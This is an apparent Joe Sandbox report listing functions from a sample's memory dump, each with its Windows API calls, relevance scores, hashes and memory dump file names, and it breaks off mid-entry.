Instruction ID: 63bbe6c3e23340f2b4e17120375a7c7be758453883b4a1fee265ac47f5dfd5a6
Opcode Fuzzy Hash: 50517f7ec3ca78b6088ba79f3a2f75c082f6f050a6ee191e2c07d2f33bfe5c5b
Instruction Fuzzy Hash: 25E092B250434836DF02AB64DC06FEE3BAC5B05785F040855B201DA1E3DA78EA54E662

Function 00CC081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CC0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CBF2D8,Crypt32.dll,00000000,00CBF35C,?,?,00CBF33E,?,?,?), ref: 00CC0858

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: eac82087b11eef4bd9d18f81970c7cbecb8d9a6008a4e982addf65bd5d6babef
Instruction ID: ecf4976debd546a27f2066b799025335e5ff27ef5a2a34b6945d9c9e332de3db
Opcode Fuzzy Hash: eac82087b11eef4bd9d18f81970c7cbecb8d9a6008a4e982addf65bd5d6babef
Instruction Fuzzy Hash: 88E048764001586BDF11A7A4DC49FDA7BACEF093D1F040065B645D3044D674EB84DBB0

Function 00CCA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CCA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CCA3E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: c6d9fdbd6aebf4c853dbea6e0d0c316fb65b0c885a03ee5e49857a22ff6f28ea
Instruction ID: 49669687d72eecd533525fb0eaa1aaee89c1f02303ba42cc89892d7c2acb4d91
Opcode Fuzzy Hash: c6d9fdbd6aebf4c853dbea6e0d0c316fb65b0c885a03ee5e49857a22ff6f28ea
Instruction Fuzzy Hash: FEE0ED71500258EBCB10DF56C555BA9BBE8EB05364F10805EE85693211E374AE04DB91

Function 00CD2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CD2BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CD2BB5

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: a81ddc9da74965a582702a71ed76306eba5fcfd50433775e9cf43367eb3000a2
Instruction ID: 7c0aa7fe1254a700e6158d837959c1f1af1fdf7fb1322a4b71d08f7833a92448
Opcode Fuzzy Hash: a81ddc9da74965a582702a71ed76306eba5fcfd50433775e9cf43367eb3000a2
Instruction Fuzzy Hash: E6D022342683403A4D146E703C43AB93786ADB2BB07B0179BF332897C1EED18180B032

Function 00CB12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00CB1306
ShowWindow.USER32(00000000), ref: 00CB130D

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 5de56714893a64ec11ee96264a770d4317a3ebc4bb62dfb4adb3440b07b9b61f
Instruction ID: 6c2e37c1e1c19654a45d35ddee7252cd3102a6e2a20dfee048b75610b5e68a39
Opcode Fuzzy Hash: 5de56714893a64ec11ee96264a770d4317a3ebc4bb62dfb4adb3440b07b9b61f
Instruction Fuzzy Hash: 06C012B245C300BECB010BB4DC09C6BBBA8ABA5312F04C908B0A5C0260CA38C160DB21

Function 00CB1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB1A09

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: def7cb17085db0a2ab7eb6848044f71844eb0099ae0dbe0df88d6d3f15b25106
Instruction ID: 325968992269c1ee8dec758bb86070ba58c891a44e9a23a383b0f4329cf0fb28
Opcode Fuzzy Hash: def7cb17085db0a2ab7eb6848044f71844eb0099ae0dbe0df88d6d3f15b25106
Instruction Fuzzy Hash: AAC18F70A002949FEF19CF78C8A8BF97BA5AF15310F5C01B9EC559F296DB309A44CB61

Function 00CB3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB3BBF

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9977704bef73ccaac2a1a83ab3d87cde0156abbb571e3ece5207b65aa4b7d27b
Instruction ID: 0798ee03ae1f33e0e26ee360f113e64abd47b89b3e96ede101e3bfd23b567798
Opcode Fuzzy Hash: 9977704bef73ccaac2a1a83ab3d87cde0156abbb571e3ece5207b65aa4b7d27b
Instruction Fuzzy Hash: D771E571500BC49EDB35DB74C855AE7B7E9AF14301F40092EF6AB87241EA32BA84EF11

Function 00CB8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB8289

Part of subcall function 00CB13DC: __EH_prolog.LIBCMT ref: 00CB13E1

Part of subcall function 00CBA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CBA598

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: beef0611e673518fa418a33d9e7a71de1e373802639134c6ceafe950124a42ff
Instruction ID: b5aef0a83264af817f555f376318d4a383ae71834fd25352e4160258fc521eaa
Opcode Fuzzy Hash: beef0611e673518fa418a33d9e7a71de1e373802639134c6ceafe950124a42ff
Instruction Fuzzy Hash: EC41C9719446589ADB20EB60CC65BEAB7BCAF00304F4404EAE59A97093EB745FC9DF10

Function 00CB13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB13E1

Part of subcall function 00CB5E37: __EH_prolog.LIBCMT ref: 00CB5E3C

Part of subcall function 00CBCE40: __EH_prolog.LIBCMT ref: 00CBCE45

Part of subcall function 00CBB505: __EH_prolog.LIBCMT ref: 00CBB50A

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 39bd61525731da22bb307d776d08f5d1f1d8f495ac2261e7175bb8f4c229051d
Instruction ID: 73cb27a5e2f633dbb050c9372a644fc5adb88ac696c2b71b77bafe998bdde926
Opcode Fuzzy Hash: 39bd61525731da22bb307d776d08f5d1f1d8f495ac2261e7175bb8f4c229051d
Instruction Fuzzy Hash: 6D4148B0905B409EE724CF798895AE7FBE5BF29300F54492ED5FE83282CB716654DB10

Function 00CB13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB13E1

Part of subcall function 00CB5E37: __EH_prolog.LIBCMT ref: 00CB5E3C

Part of subcall function 00CBCE40: __EH_prolog.LIBCMT ref: 00CBCE45

Part of subcall function 00CBB505: __EH_prolog.LIBCMT ref: 00CBB50A

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 926ef647a69de0bd25a44cd07d88118afd98a25e0eba43622432f5d3aae83e7a
Instruction ID: b3a0f5966c52f3a0b1033dd4f678712238535f86f429587aa0f225719e38a944
Opcode Fuzzy Hash: 926ef647a69de0bd25a44cd07d88118afd98a25e0eba43622432f5d3aae83e7a
Instruction Fuzzy Hash: 584157B0905B409EE724CF798895AE6FBE5FF29300F544A2ED5FE83282CB316654DB10

Function 00CC359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CC35A3

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 81ba367beedb430d6a93486f48ac81dbd7b8907d53882113a25d71cb9d38a279
Instruction ID: b3eab92ebf0d0e87b4a3ae3364223bed34f95cd73f029a656075e7895a29e824
Opcode Fuzzy Hash: 81ba367beedb430d6a93486f48ac81dbd7b8907d53882113a25d71cb9d38a279
Instruction Fuzzy Hash: 4D210FB1E40255ABDB149F75DC42F6AB6A8FB09314F04423EE616AB781D7B49A00C7A8

Function 00CCB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CCB098

Part of subcall function 00CB13DC: __EH_prolog.LIBCMT ref: 00CB13E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7c7fdcc4f84fd21cac2f7f87ad9cd4a74f412380b12844391b14b2824e996ee7
Instruction ID: bdeae522e344e0f2646fcbe67202585346107eaa39ca027fe51400b97bde10f7
Opcode Fuzzy Hash: 7c7fdcc4f84fd21cac2f7f87ad9cd4a74f412380b12844391b14b2824e996ee7
Instruction Fuzzy Hash: E4317C75C102499ECF15DFA9C861AEEBBB4AF09300F5844AEE809B7242D735AF04DB61

Function 00CDAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00CDACF8

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 62b615e07a669777ec5c09f0357d0bd1e25bf7d55c6f024eb929552450d67a3f
Instruction ID: f6944e040a49ef0c3eb7b80b51d9c25b3358723e1c82d4c968cc05956d8ecfc1
Opcode Fuzzy Hash: 62b615e07a669777ec5c09f0357d0bd1e25bf7d55c6f024eb929552450d67a3f
Instruction Fuzzy Hash: 8C11CA33A116356F9F219E1DDC80A5A7396ABC43707164222FE25EF354D731DD0187D2

Function 00CCF2E0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 00CCF312

Part of subcall function 00CCFAEC: InitializeSListHead.KERNEL32(00D11D30,00CCF337), ref: 00CCFAF1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Initialize$HeadList
String ID:
API String ID: 394358367-0
Opcode ID: f84c76eb05017edceff79c9ca93bb93d08ae5b4c31b7b96ab789fae631288a15
Instruction ID: 2b14dcafc19c1c3088465e72f51cd0f297f7355d1df73e446ae79f6da669878d
Opcode Fuzzy Hash: f84c76eb05017edceff79c9ca93bb93d08ae5b4c31b7b96ab789fae631288a15
Instruction Fuzzy Hash: 3C01A45454020175DD2033F1C837F5E524B4F01794F28083FFA989A2A3EE2AC90BB073

Function 00CB9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB921A

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 64721933665a02641f10ff210759fa49d728ad8cfa7f9796e3ce0d05ec2895b3
Instruction ID: b7b38473d302a119f7cd3e71cb2b5d11e3cbe423f69a650bc46d2b496bc54807
Opcode Fuzzy Hash: 64721933665a02641f10ff210759fa49d728ad8cfa7f9796e3ce0d05ec2895b3
Instruction Fuzzy Hash: 0901C433D00528ABCF22ABA8CC91ADEB775FF88750F014125FD16B7262DA34CE04D6A1

Function 00CD3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00CD3C3F

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 83df33facd6dda07903ba4fd103eafe365e5c4bf92c24b7179874cfb85b46e95
Instruction ID: 17b39f0fc5c9e97e13ee9021284b81fbe9a6f4a06b1ec788fb8920f68226b2c4
Opcode Fuzzy Hash: 83df33facd6dda07903ba4fd103eafe365e5c4bf92c24b7179874cfb85b46e95
Instruction Fuzzy Hash: 80F0EC332103969FCF115E69EC04A9A7799EF85B607104626FB15E7390DB31EB20D7A1

Function 00CD8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00CD4286,?,0000015D,?,?,?,?,00CD5762,000000FF,00000000,?,?), ref: 00CD8E38

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 216c0d9be398141a6111ff8b153f55ca7add94ebd31071313eae6f84e5c23af4
Instruction ID: 83d3749689398f646ea3074a903b1a91b83b8bf37e0b2ebded1dd6864c2627b1
Opcode Fuzzy Hash: 216c0d9be398141a6111ff8b153f55ca7add94ebd31071313eae6f84e5c23af4
Instruction Fuzzy Hash: E0E0E53920221596D67126269C04F9F7748DB413B0F110217AF2897BC1CF20CE0599E0

Function 00CB5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB5AC2

Part of subcall function 00CBB505: __EH_prolog.LIBCMT ref: 00CBB50A

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bebdd01e1478d9c3ade9595bdee8e7c03f763286b73bb426192673bdd8293796
Instruction ID: bce5b5a38cffce4350072ea7e3e596b0df435b5c4970be0bd065afd59545edd1
Opcode Fuzzy Hash: bebdd01e1478d9c3ade9595bdee8e7c03f763286b73bb426192673bdd8293796
Instruction Fuzzy Hash: DF013C30911694DAD725EBB8C055BEDFBA49F64304F64848DE85653282CBB41B08E7A2

Function 00CBA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00CBA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA6C4
Part of subcall function 00CBA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA6F2
Part of subcall function 00CBA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CBA592,000000FF,?,?), ref: 00CBA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CBA598

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 3b37f9c94a6c3b8a3b575a949ad866e9b938522d07dde383a0ef3ca35ff73628
Instruction ID: 428357c1698e91d5c893efe3873efeb64c7bf551fcdac9b06c2ed7aaf530a50b
